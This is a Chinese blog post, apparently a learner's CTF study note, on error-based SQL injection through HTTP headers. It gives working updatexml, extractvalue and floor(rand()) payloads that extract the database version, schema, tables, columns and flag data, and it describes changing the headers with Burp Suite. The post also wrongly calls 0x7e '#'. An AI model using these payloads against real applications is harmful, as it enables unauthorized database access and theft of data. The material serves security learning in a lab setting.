Day3 SQL注入之报错注入(Header注入)

最新推荐文章于 2024-07-30 09:06:28 发布
最新推荐文章于 2024-07-30 09:06:28 发布
阅读量398 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Luminous_song/article/details/108415220
版权

目录

报错注入

当场景中仅仅将sql语句带入查询返回页面正确,没有返回点的时候,
需要报错注入,用报错的回显把我们想要看到的东西,以一个报出错误的形式展现出来

基本SQL语句

  1. 插入数据
insert into <table_name>(columns1,columns2,...) value ('value1','value2',...)
  1. 连接字符串
select concat('a','b')

Updatexml

利用报错注入显示当前数据库名,利用连接符将非法字符联入,导致函数出现报错显现,同时把我们想要看到的数据展现出来

更新xml文档,中间参数为路径

select uodatexml(1,'~',1)

语法:updatexml(目标xml内容,xml文档路径,更新的内容)

实际上这里是去更新了XML文档,但是我们在XML文档路径的位置里面写入了子查询select database(),我们输入特殊字符concat('~',...),然后就因为不符合输入规则然后报错了
但是报错的时候他其实已经执行了那个子查询代码

select updatexml(1,concat('~',(select database())),1)

在这里插入图片描述
updatexml () 这个函数一般是配合and 或者是or 使用的,他和联合查询不同,不需要在意什么字段数,一般建议使用or
eg:

select *from news where id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

注入步骤

  1. 在靶场中看数据库返回的数据,有时会包括User-Agent,Refferer等等响应头中的信息,说明是可以利用报错注入的header注入(通过查看源码,看过滤的参数和insert into使用的参数,从而确定注入位置)
  2. 在登陆时,利用burpsuite抓包,将相应的User-Agent等修改为要注入的sql语句
  3. 在repeater中Go一下,或者使用浏览器插件修改头部再运行,即可看到想要看的数据

具体代码

基本代码解释:

  • 为了闭合插入语句中values的前引号
  • ,1)为了闭合插入语句values的前括号
  • -- anything为了注释掉后面的sql语句,每个靶场的注入点不同,有些-- qweq不可以注释后面的语句,要找到注入点(有些是可以闭合引号,写%23等等)
  • 0x7e是十六进制中的‘#’,mysql支持十六进制编码
  1. 基本的实现语句,是利用数据库中的增加,进行报错注入
insert into sanhao(name,fenshu) values ('' or updatexml(1,concat(0x7e,(select database())),1),1)
  1. 查询数据库版本
' or updatexml(1,concat(0x7e,(select version())),1),1) -- qwe
  1. 查询本数据库名称
' or updatexml(1,concat(0x7e,(select database())),1),1)-- adf
  1. 查询表名
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1) -- qwe
  1. 查询字段名
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag_head' limit 1,1)),1),1) -- qwe
  1. 查询数据
' or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),1) -- qwe

extractvalue

函数解释:
  extractvalue():从目标XML中返回包含所查询值的字符串。

extractvalue(XML_document, XPath_string)

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串),xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容
eg:

extractvalue(null,concat(0x7e,(select @@datadir),0x7e));

具体代码

' or extractvalue(1,concat(0x7e,(select database()),0x7e))-- sad

' and extractvalue(1,concat(0x7e,(select  table_name from information_schema.tables where table_schema='security'),0x7e))-- afrw

extractvalue的用法和updatexml基本一致,均只能显示32位

floor(rand()*2)

公式

and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

相关函数

rand()用于产生一个0~1的随机数
floor()向下取整
rand()函数生成0~1的数,使用floor函数向下取整,值就是固定的“0”,我们将rand*2,得到的值就变成了不固定的“0”或者“1”

探究

select count(*) from table1 group by floor(rand()*2)

由于floor(rand(0)*2)是随机产生,会先产生一个定值,在count时先取key发现是0,会重新计算floor(rand(0)*2)如果变为1,则会将key=1插入
报错的产生在于当发现一个key不存在,需要记录时,会重新计算随机值,就有可能会生产已经存在的key值,由于不能重复记录同一个key值在两条记录中,就会有报错产生

Luminous_song
关注
SQL基于HTTP Header注入 ctf从入门到放弃l190513学习笔记
爱党人士
05-14 494
队长不给活路,不写笔记不给睡觉。 什么是http header注入 ?? 有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证) 或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等等。 会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑 则可能会导致基于http header的SQL I...
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1631
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
SQL注入之HTTP头注入漏洞
Eagle_pompom的专栏
04-25 4215
输入参数主要覆盖范围有: HTTP 查询字符参数(GET):输入参数通过URL发送 HTTP 正文参数(POST):输入参数通过HTTP正文发送 HTTP Cookie参数:输入参数通过HTTP cookie发送 HTTP Headers:HTTP提交应用程序使用的头,包括User-agent和Referer头字段 潜在的HTTP头SQL注入有:Cookie, User-agent, R...
Pikachu基于extractvalue()、floor()、http header报错信息的利用
m0_63152656的博客
09-24 237
Pikachu中SQL注入基于extractvalue()、floor()、http header报错信息的利用
SQL注入header注入
qq_45691294的博客
07-21 1005
请求头参数(header) Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内容压缩编码类型。 Accept-Encoding: compress, gzip Accept-Languag
掌控安全 -- header注入
qq_51802152的博客
12-04 2472
HEADER注入
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3202
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
CTF-Web-SQL注入
beihai2013
01-26 3343
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
关于web安全之sql注入攻击
JSsomnus'sky
10-12 2477
前言:①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖到昨天才开始着手准备,时间仓促,         能力有限,不到之处请大家批评指正;       ②我尽量将文中涉及的各种技术原理,专业术语讲的更加通俗易懂,但这个前提是诸位能看得懂         基本的SQL语句(想想海璐姐你就懂了);        ③本晨讲形式为PPT+个人演讲+实际演示,但因为TTS征文限制
[红日安全]学习笔记1—SQL注入实战攻防(SQLMap、DVWA、Pikachu)
ISNS的博客
04-21 1593
最近和同学聊天: 是我太菜。
http header 注入
weixin_44720762的博客
04-14 7290
在开始讲http-header之前,我觉得有必要去简单地了解http-header http即超文本传输协议,为目前网页传输的通用协议。http采用了请求/相应模型。浏览器或者其他客户端发出请求,服务器给予响应,就整个网络资源传输而言,包括了massage-header和massage-body两部分,首先传输的是message-header,即http-header消息,http-header消...
SQL注入Update注入
weixin_43765321的博客
03-03 6066
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
SQL注入——update注入(pikachu)
W小哥
01-15 3310
第一步:访问目标站点,注册一个账号xiaosan:123456,并登录 第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456 拦截数据包,右键发送到Repeater 第三步:测试注入点 正常请求页面 输入单引号测试注入点页面 第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,co...
SQL注入漏洞-Headers注入
HacHunter的博客
03-06 2287
http header信息头是HTTP协议的重要组成部分,包含了一数据段来于服务器进行通信。我们这里主要是利用三个:UA、X-Forwarded-For和Referer。UA是包含了操作系统版本,浏览器版本信息的一组字符串,很多网站用他来判断操作系统和浏览器类型,来展示对应的页面。也有很多通过UA来判断访问是否合法,是用户访问还是程序访问等。X-Forwarded-For被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准。部分网站通过它来辨别访问者的IP信息。Refere
针对UPDATE语句的SQL注入
最新发布
qq_69100706的博客
07-30 307
在CTF(Capture The Flag)竞赛中,针对UPDATE语句的SQL注入是一种利用Web应用程序逻辑漏洞的技术,当应用程序使用用户提供的数据来更新数据库中的记录时尤为常见。如果应用程序没有正确地清理或参数化这些用户输入,攻击者就可以注入恶意SQL代码,以操纵数据库更新操作。
update语句_WEB安全之SQL注入(13)——update注入
weixin_39848953的博客
12-09 2649
01前言大家好,我是阿里斯,一名IT行业小白。上一篇文章分享了insert注入,算是一个铺垫,今天我们一起来看看update注入,update注入是非常危险一种注入。可能因为payload构造不合理会直接导致整张表都被修改。02update注入update正常语句update users set sex='man' where id=$id;update注入是非常危险的,不管你开发还是安...
SQL注入实战:Update注入
ting_liang的博客
01-21 1141
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了update。update表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类型sql语句的用户输入的内容的过滤。二、mysql的Update语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
2021-07-08 CTFer成长之路-SQL注入-UPDATE 注入
热门推荐
时光隧道
07-08 5万+
一:UPDATE 注入 UPDATE语句适用于数据库记录的更新,如用户修改自己的文章、介绍信息、更新信息等。UPDATE语句的语法如下: 例如,以注入点位于SET后为例。一个正常的update语句如图1-2-41,可以看到,原先表wp_user第2行的id数据被修改。 当id数据可控时,则可修改多个字段数据,形如 update wp_user set id=3,user='xxx' user = '23' 其余位置注入点利用方式与SELECT注入类似,这里不再赘述。 ...
5-9http header注入讲解和案例演示
山兔的博客
05-11 658
基于HTTP Header注入  什么是http header注入  基于http header(cookie)注入的测试  基于http header(其他字段)注入的测试 什么Http Header注入 http header不是一个漏洞,是一个出现sql注入漏洞的场景,有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证),它会把客户端的cookie获取到之后,去到后端进行相关的操作 或者通过http header头信息获取客户端的一些信息,比如useragent、accept
绕过安全狗的注入攻击策略:%00.&技巧
本文主要讨论的是在网络安全环境中如何通过特定的SQL注入技巧来绕过安全狗(一种常见的网站安全防护系统)进行进一步的渗透和攻击。作者首先提到在90sec论坛上的经历,由于对于信息安全的兴趣,他尝试了解一些技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值